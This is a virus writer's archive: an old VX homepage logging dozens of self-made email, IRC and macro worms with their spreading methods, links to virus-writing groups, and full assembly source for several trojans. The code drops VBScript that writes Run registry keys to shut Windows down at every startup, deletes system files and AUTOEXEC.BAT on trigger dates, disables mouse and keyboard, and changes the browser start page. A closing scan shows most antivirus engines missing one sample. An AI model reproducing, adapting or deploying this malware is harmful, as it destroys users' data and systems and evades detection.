PetiK Archiver 1.0
17/05/2009
After seven years away from coding viruses/worms, I decided to assemble all my works. They are sorted by date as YYYYMMDD (Y = year, M = month, D = day) followed by the name of the work. At the beginning you can see my old website page, then my works, then my unfinished works and some articles.
Happy reading.

PetiK Homepage (last update: July 9th 2002)
EMAIL : [email protected]
NEW : FORUM FOR ALL VXERS : CLICK HERE
PLEASE SIGN MY GUESTBOOK : CLICK HERE
2002
July 9th: GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE YOU LIKE MY WORKS AND THAT THEY WILL HELP YOU IN YOUR VX-LIFE. IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK. Special thanks to: alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98 and the greatest coder group: 29A
July 7th: Added some new AV descriptions (from Trend Micro and McAfee)
July 3rd: Added the binary of my last worm, coded with alc0paul: VB.Brigada.Worm
July 2nd: Added a new link: Second Part To Hell
June 29th: Added my new tool, PetiK's VBS Hex Convert, and my last full-spread VBS worm: VBS.Hatred
June 26th: Added W32/HTML.Dilan
June 24th: Added VBS.Park
June 22nd: Finished my new worm: VB.DocTor.Worm
June 20th: PETIKVX EZINE #2 RELEASED: DOWNLOAD IT. Added a new tool, CryptoText, and my last worm: VB.Mars.Worm
June 19th: Added VBS.Cachemire. Added my new article VBS/HTML Multi-Infection.
June 16th: I joined a new virus group: Brigada Ocho (created by alc0paul)
June 1st: Added VB.Lili.Worm. My new worm is released: I-Worm.Haram
May 31st: I left the rRlf group
May 23rd: New ezine: rRlf#2
May 19th: I removed some sources. You can find some of them in PetiKVX#1 and the others in PetiKVX#2. Finished VB.Visual.Worm, published in PetiKVX #2
May 14th: Added W97M.ApiWord
May 12th: Added W32.HLLW.Archiver
May 10th: Added a new tool to protect against new VBS worms: PPVBSW
May 9th: Added a new macro virus: W97M.AutoSpread
May 8th: I joined the rRlf group (http://www.rrlf.de). Added HTML.Welcome.
May 6th: Added a new article: VBS Tutorial, also available in PDF
April 27th: Added VBS.Xchange
April 21st: Added all sources of my works.
April 7th: Added my first ezine: PetiKVX Ezine #1. My new email is [email protected]
March 15th: Added I-Worm.Together
March 14th: My new email: [email protected] ([email protected] failed)
March 10th: Added W32.HLLW.LiteLo
March 9th: Added my articles in PDF format: articlesPDF and 29A#6.
March 8th: Added my first VBS worm and HTML virus generator: PSWVG (W32.PSVG.gen: Norton AntiVirus, Constructor.VBS.PSWVG.10: AVP)
March 3rd: Added a new virus/worm: VBS/W97M.Doublet
February 25th: Added a macro virus: W97M.Wolf
February 24th: Added a lame love worm: HTML.Linda
February 22nd: Added W32.HLLW.Wargames
February 18th: Added a new ezine: rRlf
February 16th: Added my first virus (perhaps buggy): WinRAR.Linda
February 14th: Added a new HTML virus: HTML.Macrophage
February 10th: My last worm can now be downloaded. Added my second article: Technics
February 7th: Finished my last worm: I-Worm.Falken (cannot be downloaded immediately)
February 4th: Added a new worm: I-Worm.Extract
February 1st: New worm: W32/W97M.Twin
January 27th: I came back with a new worm: HLLW.SingLung.Worm
January 20th: Added PetiKShow. This program contains all the sources of my works.
January 10th: Added an old article about worm spreading, written by me on September 19th.
January 1st: HAPPY NEW YEAR. I DECIDED TO STOP CODING VIRII AND WORMS. GOOD BYE

2001
December 10th: Added my last worm: W32.HLLW.Last
November 6th: I-Worm.Anthrax
October 12th: I-Worm.WTC
September 8th: I-Worm.Passion
September 2nd: I-Worm.Rush
August 24th: I-Worm.Casper
August 18th: Added the tool tElock 5.1 (a PE file compressor/encryptor)
August 16th: I-Worm.Kevlar
August 12th: New design. You can hear one of my compositions.
August 9th: New descriptions from AVP about I-Worm.MadCow and I-Worm.Friends.
August 8th: I-Worm.XFW
July 18th: New family: W32.Pet_Tick family (6), VBS.Pet_Tick family (3), from Norton Antivirus
July 8th: I-Worm.MaLoTeYa
July 3rd: VBS.Delirious
June 30th: I-Worm.Bush
June 19th: I-Worm.Winmine
June 18th: W97M.Blood
June 17th: VBS.Seven
June 10th: VBS.Starmania, I-Worm.Gamma, W97M.Kodak
June 4th: BAT.Quatuor
June 3rd: Bastille, JS.Germinal
June 2nd: Added some worms: HTML.Embargo, I-Worm.Mustard
May 25th: I started my homepage.

Source
You can find here the different worms that I created.
Each entry gives the real name, the date (MM/DD/YYYY), the antivirus names it is detected under (TM = Trend Micro), and a description.

Bastille (06/03/2001): AVP: IRC.Worm.PetiK; TM: Bat.PetiK.A. A DOS worm. It uses mIRC to spread. On July 14th it halts the computer.
BAT.Quatuor (06/04/2001): IRC.Becky.A. A BAT file which uses mIRC to spread.
CryptoText (06/20/2002): Coded in VB6. Encrypts ASCII files.
HTML.Bother (05/13/2001): HTML.Bother.3180; AVP: VBS.Both; TM: HTML.Bother.A. A script that uses ActiveX controls to perform its actions. It modifies the default home page and infects all .HTM and .HTML files it finds in the \MY DOCUMENTS and \WINDOWS\WEB folders. The default icon for .html files is changed.
HTML.Embargo (05/29/2001): VBS.Embaro.A.Intd. Copies itself to \WINDOWS\WinHelp.htm and changes AUTOEXEC.BAT. Uses mIRC channels to spread.
HTML.Linda (02/24/2002): A lame love worm.
HTML.Macrophage (02/14/2002): HTML.Prepend; Panda: HTML/Mage. Infects htm, html, htt, hta and asp files in several special folders.
HTML.Welcome (05/08/2002): VBS.Manu@mm; TM: VBS.PATIK.G. My first virus for the rRlf group. Infects web files (htm, html, htt, asp) and spreads with Outlook as a VBS file.
I-Worm.Anthrax (11/06/2001): W95.Pet_Tick.gen; TM: Worm.Pettick.A; Sophos: W32/Petick-A. Opens the default WAB file to collect email addresses and spreads with MAPI. Spreads with mIRC too.
I-Worm.Bush (06/30/2001): W95.Pet_Tick.E@mm; AVP: I-Worm.PetiK.e. Uses MAPI to spread. No bugs.
I-Worm.Casper (08/24/2001): TM: Worm.Capser.A. A utility which detects Happy99 and Icecubes. Uses MAPI. Perhaps buggy.
I-Worm.Dandelion (11/16/2001): UNRELEASED WORM.
I-Worm.Extract (02/04/2002): Panda: W32/Extract; TM: WORM.PETIK.L. Opens KERNEL32.DLL to find the APIs it needs.
I-Worm.Falken (02/07/2002): First WGAA worm. WARNING!
I-Worm.Friends (05/05/2001): W32.Pet_Tick.B; W32.Fiend.Worm; AVP: I-Worm.PetiK.b. Uses a VBS file and mIRC to spread. Alters the Windows registered owner and company.
I-Worm.Gamma (05/09/2001): W95.Pet_Tick.D@mm; W95.Wormfix.Worm@mm; AVP: I-Worm.PetiK.c. Scans all *.*htm* files in "Temporary Internet Files" and uses MAPI functions to spread.
I-Worm.Haram (06/01/2002): Spreads with a randomly named VBS file in the StartUp folder and drops an HTML virus.
I-Worm.Kevlar (08/16/2001): W32.Pet_tick.M; TM: Worm.Kevlar.A; Panda: Worm.PetiK.C. Infects C???????.exe. Collects email addresses from the Outlook Address Book and uses MAPI to spread.
I-Worm.Loft (06/23/2001): W32.Pet_Tick.Intd; Sophos: W32/Petik-K; AVP: I-Worm.PetiK.k; TM: Worm.PetiK.K. Uses MAPI functions to spread. Opens some DLL files to use their APIs.
I-Worm.MadCow (12/01/2000): W32.Pet_Tick.A@mm; W32.Salut.Worm@mm; AVP: I-Worm.PetiK.a. My first worm. It uses Outlook and mIRC to spread. It creates \SYSTEM\MSLS.ICO, which becomes the default icon of .exe files.
I-Worm.MaLoTeYa (07/08/2001): W32.Pet_Tick.G; W32.Malot.Int; AVP: I-Worm.PetiK.f; TM: Worm.Malot.A. Uses MAPI to spread. Creates an HTML file in the StartUp folder to send information about the user. Contributed to 29A#6.
I-Worm.Mustard (05/27/2001): W32.Update.Worm; AVP: I-Worm.PetiK.d; TM: Worm.Mustard.A. Modifies "Exclude.dat" in the Norton Antivirus install folder and creates a VBS file. The worm spreads with Outlook using this VBS file.
I-Worm.Passion (09/08/2001): W95.Pet_Tick.gen. Copies every address of the Outlook Address Book into a file and scans that file to spread. Changes some URLs one time in ten.
I-Worm.PetiK (02/07/2001): W95.Pet_Tick.C@mm; W95.Buggy.Worm@mm; AVP: I-Worm.IEPatch; TM: Worm.PetiK.A. Replaces the wallpaper with a BMP file downloaded from an FTP site. Spreads with a VBS file which uses Outlook.
I-Worm.Rush (09/02/2001): TM: Worm.Rush.A. No bugs in the MAPI functions. Propagation started by mistake on August 30th. Some payloads based on window titles.
I-Worm.Together (03/15/2002): W32.Pet_Tick.AC@mm. Kills some AV. 100% assembler.
I-Worm.Winmine (06/19/2001): W32.Mineup.Worm; AVP: I-Worm.Petik; McAfee: W32/PetTick@MM; Panda: W32/PetTick. Uses Outlook to spread.
I-Worm.WTC (10/11/2001): Sophos: W32/Petik-WTC; TM: WORM.PETTICK.Q. A worm against terrorism. Infects RAR files in the Personal directory.
I-Worm.XFW (08/08/2001): W95.Pet_tick.gen; TM: Trojan.PetiK.XFW; Panda: Worm.PetiK.D. Infects WSOCK32.DLL and all DLL files in the SYSTEM directory.
JS.Germinal (06/02/2001): JS.Lamnireg.A Trojan; AVP: JS.Germinal; TM: JS.Germinal.A. Infects JS files in the \WINDOWS, \WINDOWS\Desktop and \WINDOWS\SAMPLES\WSH directories. Uses mIRC to spread.
VB.Brigada.Worm (07/03/2002): TM: WORM.CRAZYBOX.A. Coded with alc0paul. Spreads with Word macros, ZIP and Outlook. My last worm.
VB.DocTor.Worm (06/22/2002): W32/W97M.Dotor.Worm; McAfee: W32/DoTor; Panda: W32/Dotor.A. Spreads by infecting DOC files.
VB.Lili.Worm (06/01/2002): W32.Pet_Ticky.B; Panda: W32/Petlil.A. A lame worm with an XXX picture.
VB.Mars.Worm (06/20/2002): W32.Gubed.Worm; McAfee: W32/Gubed; TM: WORM.GUBED.A. Spreads by scanning the Internet Explorer start page for email addresses. The binary is also stored inside a VBS file in the %StartUp% folder.
VB.Visual.Worm (05/19/2002): W32.Pet_Ticky.gen. My first worm coded in Visual Basic. Lame worm.
VBS.Cachemire (06/19/2002): A worm which spreads over the local network and spreads very effectively.
VBS.Delirious (07/03/2001): VBS.Pet_Tick.C@m; VBS.Ketip.C@m; AVP: I-Worm.Petik.h. Puts its code in NORMAL.DOT.
VBS/W97M.Doublet (03/03/2002): VBS.Doublet@mm. Infects VBS and DOC files. Spreads with Outlook.
VBS/W97M.Xchange (04/27/2002): Infects VBS files and Word DOC documents. Contributed to rRlf#2.
VBS.GoodBye (12/01/2001): UNRELEASED WORM.
VBS.Hatred (06/29/2002): Encrypted with my tool "PetiK's VBS Hex Convert".
VBS.Judge (12/08/2000): VBS.Pet_Tick.B@mm; VBS.Ketip.B@mm. Uses FTP to download a file (a virus? a trojan horse?). On the 1st of the month, Judge modifies AUTOEXEC.BAT.
VBS.Park (06/24/2002): A VBS/HTML multi-infection virus.
VBS.PetiK (01/31/2001): VBS.Pet_Tick.A@mm; VBS.Ketip.A@mm; AVP: I-Worm.LeeBased. Arrives as an HTML email message. Uses Outlook and mIRC clients to spread. Infects various files and sends information from the infected computer to two email addresses.
VBS.Seven (06/18/2001): VBS.Chism@mm; VBS.Copy.A@mm; AVP: I-Worm.Petik.i; TM: VBS.PETIK.I. Different actions depending on the day.
VBS.Starmania (06/15/2001): VBS.ManiaStar.A@mm; AVP: IRC-Worm.generic.vbs. Infects all VBS files in several folders. Spreads with three different subjects, bodies and attachments.
W32.HLLW.Archiver (05/12/2002): Infects ZIP files in certain folders.
W32.HLLW.Last (12/10/2001): Sophos: W32/Stall-A. My very first (and last) worm written with Borland C++.
W32.HLLW.LiteLo (03/10/2002): A lame HLL worm.
W32.HLLW.SingLung (01/27/2002): AVP: I-Worm.Stopin. Opens *.ht* files to find email addresses and spreads with MAPI functions.
W32.HLLW.Wargames (02/22/2002): AVP: I-Worm.WarGam; Viruslist: WarGame; W32.WarGam.Worm. Several propagation methods: opens *htm files, reads old mail and the Outlook Address Book.
W32/W97M.Twin (02/01/2002): W97M.Comical; Sophos: W97M.Comical. Uses VBA and W32asm to spread.
W32/HTML.Dilan (06/26/2002): Spreads via HTML files by infecting them in specific folders.
Win32RAR.Linda (02/16/2002): Infects RAR files by adding the virus and HTM files by adding a script.
W97M.ApiWord (05/14/2002): W97M.Apish. Uses some APIs to infect Word documents.
W97M.AutoSpread (05/09/2002): W97M.Beko@mm. Wide spreading. Uses the "Sleep" API export.
W97M.Blood (06/18/2001): W97M.Pet_Tick.Intd; W97M.Ketip.Intd; AVP: Embedded. Infects NORMAL.DOT.
W97M.Kodak (06/10/2001): W97M.Adok.A; AVP: Macro.Word97.Adok. Infects NORMAL.DOT.
W97M.Maya (06/05/2001): W97M.OutlookWorm.Gen; AVP: Macro.Office.Melissa-based; TM: W97M.AYAM.A. Uses mIRC and Outlook to spread.
W97M.Wolf (02/25/2002): W97M.Droopy.A. Infects .doc files with the "Wolf" module. Thanks to Walrus.
Links

A selection of the best virii sites:

VirLinux: http://www.virlinux.fr.fm (a French site about Linux virii)

VIRUS CODERS:
Alc0paul: http://alcopaul.cjb.net
Belial: http://home.foni.net/~belial
Benny: http://www.coderz.net/benny
Black Jack: http://blackjackvx.cjb.net
Del_Armg0: http://www.delly.fr.st (French coder)
FlyShadow: http://flyshadow.cjb.net
Gigabyte: http://www.coderz.net/gigabyte
Immortal Riot: http://www.immortalriot.cjb.net
Kalanar: http://virii.at/ak or http://www.kvirii.com.ar
Lord Julus: http://lordjulus.cjb.net
NBK: http://www.nbk.hpg.ig.com.br
Nucleii: http://www.coderz.net/nucleii/main.html
Pointbat: http://pbat.cjb.net/ (French coder)
Silvio: http://www.big.net.au/~silvio/
Ratter: http://www.coderz.net/ratter/
SPTH (Second Part To Hell): http://www.spth.de.vu/
The Walrus: http://walrus.up.to
Tipiax: http://www.multimania.com/tipiax (French coder)
Vecna: http://www.coderz.net/asm_infamy
VirusBuster: http://vtc.cjb.net
Voven/SMF: http://vovan-smf.wz.cz/
VXUniverse: http://vxuniverse.cjb.net
ZeMacroKiller98: http://www.crosswinds.net/~zemacrokiller98/index.htm (French coder)
Zulu: http://www.coderz.net/zulu

VX GROUPS:
29A: http://29a.host.sk
ASM: http://kickme.to/asm
BlackArt: http://blackart.cjb.net
Black Cat virii Group: http://www.ebcvg.com or http://bcvgvx.cjb.net/
Brigada Ocho: http://brigada8.cjb.net
HFX: http://www.hfactorx.org/
Indonesian Virus: http://indovirus.8m.com/
Kryptocrew: http://www.kryptocrew.de
LineZero: http://www.coderz.net/lz0vx/start.htm
MATRiX: http://www.coderz.net/mtxvx
NoMercy: http://www.coderz.net/nomercy/
Pinoy Virus Writer: http://hackers.b3.nu
rRlf: http://www.rrlf.de/
ShadowVX: http://shadowvx.members.easyspace.com/
SMF: http://www.sallyone.com/smf/e_index.htm, http://smfgroup.cjb.net
Ultimate Chaos: http://www.ultimatechaos.co.uk/
Virus Brasil: http://www.virusbrasil.8m.com

OTHER SITES:
Coderz: http://www.coderz.net
Red Virica: http://redvirica.host.sk/
Virii Argentino: http://www.virii.com.ar
Virus Central: http://www.viruscentral.org/
VirusList: http://www.viruslist.com
Virus Trading Center: http://www.oninet.es/usuarios/darknode/
VX-DNET: http://surf.to/vxdnet
VX Heavens: http://vx.netlux.org/
Virus Trading: http://www.virustrading.com/
VX Universe: http://vxuniverse.cjb.net/
ExeTools: http://www.exetools.com
ProTools: http://protools.cjb.net

ANTIVIRUS SITES:
AVP: http://www.avp.ch
Symantec: http://www.symantec.com/avcenter
Trend Micro: http://www.trendmicro.com

CONTACT: GuestBook
© 2001-2002 PetiK. All information on this site is for educational purposes only.
; SIZE: 475 BYTES                                           31/08/00
; DWARF creates a file dwarf.vbs that adds a registry key so that
; the computer shuts down at startup.
        .model small
        .code
        org 100h

DEBUT:
        mov ah,09h              ; display a message
        lea dx,text1            ; offering two choices
        int 21h

TOUCHE:
        mov ah,1                ; read a character
        int 21h
        cmp al,'C'
        je  CREER_FICHIER
        cmp al,'c'
        je  CREER_FICHIER       ; 'C'/'c': continue
        cmp al,'Q'
        je  FIN_PROGRAMME
        cmp al,'q'
        je  FIN_PROGRAMME       ; 'Q'/'q': quit
        mov dx,offset bad       ; wrong key
        mov ah,9h
        int 21h
        jmp TOUCHE

CREER_FICHIER:
        mov ah,3Ch              ; create a file
        xor cx,cx
        mov dx,offset NOM       ; and give it a name
        int 21h
ECRIRE_FICHIER:
        xchg ax,bx
        mov ah,40h              ; write into the file
        mov cx,meslen
        mov dx,offset note
        int 21h
FERMER_FICHIER:
        mov ah,3Eh              ; then close it
        int 21h
        mov dx,offset updir     ; change directory
        mov ah,3Bh
        int 21h

MESSAGE:
        mov ah,09h              ; display the message
        lea dx,msg
        int 21h

FIN_PROGRAMME:
        mov ah,4Ch              ; exit the program
        int 21h

text1   db 10,13,'Tape C pour continuer ou Q pour quitter : $'
bad     db 7,7,8,' ',8,24h
NOM     db 'c:\dwarf.vbs',0
updir   db '..',0
msg     db 7,7,7,10,13,'SALUT MEC !!!!'
        db 10,10,13,'UN FICHIER A ETE RAJOUTE'
        db 10,13,'IL SE NOMME C:\dwarf.vbs $'
note    db 'rem DwArF.vbs by Panda '
        db '(c) 2000'
prog    db 'Dim WSHShell',0Dh,0Ah
        db 'Set WSHShell = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'WSHShell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\'
        db 'Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
        db 'C:\Windows\system\User.exe,ExitWindows"'
meslen  equ $-note
        end DEBUT


; By M.Xxxxxxx XXXXXXX (c)2000                               09/09/00
; SIZE: 689 BYTES
; FIRST TESTED AT LYCEE KIRSCHLEGER, MUNSTER
; DWARF259 CREATES TWO PROGRAMS:
;   - Dwarf.vbs in C:\ runs Evil.com at every startup
;   - Evil.com in C:\WINDOWS.
; On September 25th it renames REGEDIT.EXE into the recycle bin
; as DWARF.AZE and deletes AUTOEXEC.BAT and WIN.INI
        .model small
        .code
        org 100h

TOUT_DEBUT:
        jmp FILE1

VERIFICATION:
        mov ah,2Ah              ; get the system date
        int 21h
        cmp dh,9                ; September?
        jnz FIN_VIRUS
        cmp dl,25               ; the 25th?
        jnz FIN_VIRUS           ; no: end of the trojan
AFFICHE:
        mov ah,9
        lea dx,MSG
        int 21h
DISQUE:
        mov ah,41h
        mov dx,offset AUTOEXEC
        int 21h                 ; delete AUTOEXEC.BAT
        mov dx,offset WININI
        int 21h                 ; delete WIN.INI
        mov ah,56h
        mov dx,offset REG       ; rename REGEDIT.EXE
        mov di,offset CORBEILLE ; to DWARF.AZE
        int 21h
FIN_VIRUS:
        mov ah,4Ch
        int 21h

MSG     db 7,7,7,'TROJAN.DWARF par PandaKiller (c)2000'
        db 10,10,13,'BOOM! BOOM! BOOM! BOOM! BOOM! BOOM!'
        db 10,13,' ÛÛÛ Û Û ÛÛ ÛÛÛ ÛÛÛÛ'
        db 10,13,' Û Û Û Û Û Û Û Û Û '
        db 10,13,' Û Û Û Û ÛÛÛÛ ÛÛÛ ÛÛÛ '
        db 10,13,' Û Û Û Û Û Û Û Û Û Û '
        db 10,13,' ÛÛÛ Û Û Û Û Û Û Û $'

WININI    db 'C:\WINDOWS\Win.ini',0
AUTOEXEC  db 'C:\autoexec.bat',0
REG       db 'C:\WINDOWS\Regedit.exe',0
CORBEILLE db 'C:\RECYCLED\dwarf.aze',0
progl2    equ $-VERIFICATION

FILE1:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM1
        int 21h                 ; create the 1st file
        xchg ax,bx
        mov ah,40h
        mov cx,progl1           ; program length
        mov dx,offset prog1     ; program start
        int 21h                 ; write
        mov ah,3Eh
        int 21h                 ; close
FILE2:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM2
        int 21h                 ; create the 2nd file
        xchg ax,bx
        mov ah,40h
        mov cx,progl2           ; program length
        lea dx,VERIFICATION     ; program start
        int 21h                 ; write
        mov ah,3Eh
        int 21h                 ; close
FIN:
        mov ah,4Ch
        int 21h

NOM1    db 'c:\Dwarf.vbs',0
NOM2    db 'c:\WINDOWS\Evil.com',0
prog1   db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
        db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
        db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"'
progl1  equ $-prog1
        end TOUT_DEBUT


; By M.Xxxxxxx XXXXXXX (c)2000                               12/09/00
; SIZE: 1282 BYTES
; DWARF7 CREATES TWO PROGRAMS: Dwarf.vbs and Panda.vbs. DWARF.VBS ADDS
; A KEY TO RUN PANDA.VBS EVERY DAY. PANDA.VBS ONLY ACTS ON DECEMBER 5TH.
; IT ADDS A KEY TO SHUT THE COMPUTER DOWN AT STARTUP AND CREATES A FILE
; AUTOEXE.BAT THAT WILL DELETE FILES ON THE COMPUTER.
        .model small
        .code
        org 100h

FILE1:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM1
        int 21h                 ; create the 1st file
        xchg ax,bx
        mov ah,40h
        mov cx,progl1
        mov dx,offset prog1
        int 21h                 ; write
        mov ah,3Eh
        int 21h                 ; close
FILE2:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM2
        int 21h                 ; create the 2nd file
        xchg ax,bx
        mov ah,40h
        mov cx,progl2
        mov dx,offset prog2
        int 21h                 ; write
        mov ah,3Eh
        int 21h                 ; close
MESSAGE:
        mov ax,3                ; reset to 80x25 text mode (clears screen)
        int 10h
        mov ah,9
        lea dx,msg
        int 21h
FIN:
        mov ah,4Ch
        int 21h

NOM1    db 'c:\Dwarf.vbs',0
NOM2    db 'c:\WINDOWS\Panda.vbs',0
prog1   db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
        db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKLM\Software\Microsoft\Windows'
        db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"'
progl1  equ $-prog1
prog2   db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah
        db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah
        db 'Dim W',0DH,0Ah
        db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah
        db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
        db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
        db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah
        db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
        db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah
        db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah
        db 'file="C:\autoexe.bat"',0DH,0Ah
        db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah
        db 'O.Writeline "@echo off"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah
        db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah
        db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah
        db 'End If',0DH,0Ah
progl2  equ $-prog2
msg     db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
        db 'IL SE NOMME C:\Dwarf.vbs',10,10,13
        db 'OUVRE LE VITE $'
        end FILE1


; Panda3.asm by PandaKiller                                  03/10/00
; TASM32 /M /ML panda3
; TLINK32 -Tpe -x -aa panda3,,,import32
        .386
        locals
        jumps
        .model flat

extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn MessageBoxA:PROC
extrn WinExec:PROC
extrn ExitProcess:PROC

        .data
octets      dd ?
flz_handle  dd ?
nom_fichier db 'C:\Salut.vbs',00h
prog        db 'C:\Salut.vbs',00h
TEXTE       db 'Salut ! Ca va ?',00h
TITRE       db 'Hello',00h
TEXTE2      db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah
            db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah
            db 'Ouvre-le vite',00h
TITRE2      db 'FICHIER CREE',00h
CLE         db '\Software\Microsoft\Windows\CurrentVersion',00h
DONNEE      db 'PandaKiller',00h
NOM         db 'RegisteredOwner',00h
p           dd 0
l           dd 0

DEBUTV:                         ; the VBScript written to C:\Salut.vbs
        db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah
        db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah
        db '',0dh,0ah
        db 'DEBUT()',0dh,0ah
        db 'Sub DEBUT()',0dh,0ah
        db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah
        db 'Set win = a.GetSpecialFolder(0)',0dh,0ah
        db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah
        db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah
        db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah
        db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah
        db 'INTERNET()',0dh,0ah
        db 'BUG2001()',0dh,0ah
        db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah
        db 'End Sub',0dh,0ah
        db '',0dh,0ah
        db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah
        db 'Sub INTERNET()',0dh,0ah
        db 'Dim W',0dh,0ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah
        db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
        db 'Start Page", "http://www.penthouse.com"',0dh,0ah
        db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
        db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah
        db 'End Sub',0dh,0ah
        db '',0dh,0ah
        db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah
        db 'Sub BUG2001()',0dh,0ah
        db 'If Year(Now) = 2001 Then',0dh,0ah
        db ' Dim P',0dh,0ah
        db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah
        db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
        db 'Stop1", "rundll32,mouse disable"',0dh,0ah
        db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
        db 'Stop2", "rundll32,keyboard disable"',0dh,0ah
        db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah
        db 'End If',0dh,0ah
        db 'End Sub',0dh,0ah
taille  equ $-DEBUTV

        .code
REGISTRE:
        push offset l           ; lpdwDisposition
        push offset p           ; phkResult
        push 0
        push 1F0000h + 1 + 2h   ; STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | KEY_SET_VALUE
        push 0
        push 0
        push 0
        push offset CLE
        push 80000002h          ; HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h                ; cbData
        push offset DONNEE      ; "PandaKiller"
        push 01h                ; REG_SZ
        push 0
        push offset NOM         ; into RegisteredOwner
        push p
        call RegSetValueExA     ; set the registry value
        push 0
        call RegCloseKey        ; close the registry key
FICHIER:
        push 00h
        push 80h                ; FILE_ATTRIBUTE_NORMAL
        push 02h                ; CREATE_ALWAYS
        push 00h
        push 01h                ; FILE_SHARE_READ
        push 40000000h          ; GENERIC_WRITE
        push offset nom_fichier ; the file name
        call CreateFileA
        mov [flz_handle],eax
        push 00000000h
        push offset octets
        push offset taille
        push offset DEBUTV
        push [flz_handle]
        call WriteFile
        push [flz_handle]
        call CloseHandle
MESSAGE:
        push 40h                ; MB_ICONINFORMATION
        push offset TITRE
        push offset TEXTE
        push 0
        call MessageBoxA
        push 40h
        push offset TITRE2
        push offset TEXTE2
        push 0
        call MessageBoxA
        push 1                  ; SW_SHOWNORMAL
        push offset prog        ; run C:\Salut.vbs
        call WinExec
FIN:
        push 0
        call ExitProcess
        end REGISTRE

Multi-engine scan result for Panda3.exe, file received on 05.16.2009 18:00:23 (CET): 4 of 40 engines flagged the file.
  BitDefender 7.2 (2009.05.16): Generic.Malware.Ssp!.1E162891
  GData 19 (2009.05.16): Generic.Malware.Ssp!.1E162891
  Kaspersky 7.0.0.125 (2009.05.16): Type_Script
  Symantec 1.4.4.12 (2009.05.16): W95.Pet_Tick.gen
No detection (signatures dated 2009.05.08 to 2009.05.16): a-squared, AhnLab-V3, AntiVir, Antiy-AVL, Authentium, Avast, AVG, CAT-QuickHeal, ClamAV, Comodo, DrWeb, eSafe, eTrust-Vet, F-Prot, F-Secure, Fortinet, Ikarus, K7AntiVirus, McAfee, McAfee+Artemis, McAfee-GW-Edition, Microsoft, NOD32, Norman, nProtect, Panda, PCTools, Prevx, Rising, Sophos, Sunbelt, TheHacker, TrendMicro, VBA32, ViRobot, VirusBuster.
